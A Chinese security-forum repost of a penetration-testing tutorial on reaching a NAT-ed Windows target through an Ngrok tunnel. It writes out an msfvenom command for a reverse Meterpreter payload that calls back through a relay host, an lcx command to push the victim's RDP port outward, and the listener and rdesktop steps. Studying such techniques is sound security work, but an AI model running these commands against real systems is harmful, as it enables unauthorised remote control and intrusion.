安全矩阵

 找回密码
 立即注册
搜索
查看: 4455|回复: 0

Metaspolit下配合Ngrok同时实现内网反弹+转发

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-5-3 22:05:28 | 显示全部楼层 |阅读模式
本帖最后由 gclome 于 2020-5-3 22:06 编辑

原文链接:Metaspolit下配合Ngrok同时实现内网反弹+转发

相信大家在渗透测试时如果遇到内网IP瞬间心情就不好了,因为自己是内网,目标也是内网,怎么勾搭上?而且像我这等穷人又没钱买死贵死贵的vps搭建云Kali,怎么办?这时候就要借助内网穿透工具了,网上很多工具都能实现,这里推荐Ngrok。但是我既想通过Ngrok在metaspolit下反弹shell,同时又想把对方的3389端口转发到本地,在meterperter下鱼和熊掌我都要!

Kali地址:192.168.61.130(攻击机地址)
靶机win2008: 192.168.61.134(模拟外网私人地址)
中间跳板ngrok :vipgz4.idcfengye.com
工具:lcx windows版与linux版

一、反弹shell到本地

1.首先注册个ngrok并配置好需要转接的端口:8848(这里就不在赘述如何配置了,网上教程很多。)


2.在kali下构造生成反弹木马:
  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=vipgz4.idcfengye.com LPORT=10040 -f exe -a x86 --platform win -o gong32.exe
复制代码
Lhost:为Ngrok服务地址
Lport:为Ngrok分配的隧道端口

3.在Kali中运行Ngrok的客户端:
  1. ./sunny clientid Ngrok的ID号
复制代码

4.Kali攻击机配置监听:
此处的lhost与lport与Ngrok中的配置相同,并开始监听。

5.将生成的木马放到靶机运行:
成功得到通过中转反弹过来的shell。
PS:接下就要将对方的端口转发到我们本地了,以3389端口远程桌面为例。由于是通过Ngrok中转反弹到的shell,所以portfwd命令不能将远程桌面直接在metaspolit框架中实现,这里借助lcx继续进行反弹。

二、转发3389端口到本地

1.在Kali中执行lcx监听和转发命令:
  1. ./portmap -m 2 -p1 8848 -p2 33891
复制代码
P1为本地监听的端口(与ngrok转发的端口一致)
P2为本地转发的端口(随便命名,但不能是已被占用的端口)

2.到靶机中执行lcx端口转发,通过meterperter进入shell执行命令:
  1. lcx -slave vipgz4.idcfengye.com 10040 127.0.0.1 3389
复制代码
slave后跟Ngrok服务器地址与隧道端口+本地需要转发的端口


看到ngrok客户端多出回弹的消息



3.开始在Kali中连接远程桌面连接:
  1. rdesktop 127.0.0.1:33891
复制代码








至此我们已经成功连接上了3389远程桌面。由于全程都在一台本地kali环境中操作,且只用了一条Ngrok隧道大大减少了成本。
*本文作者:waowao,转载请注明来自FreeBuf.COM




回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 23:33 , Processed in 0.014784 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表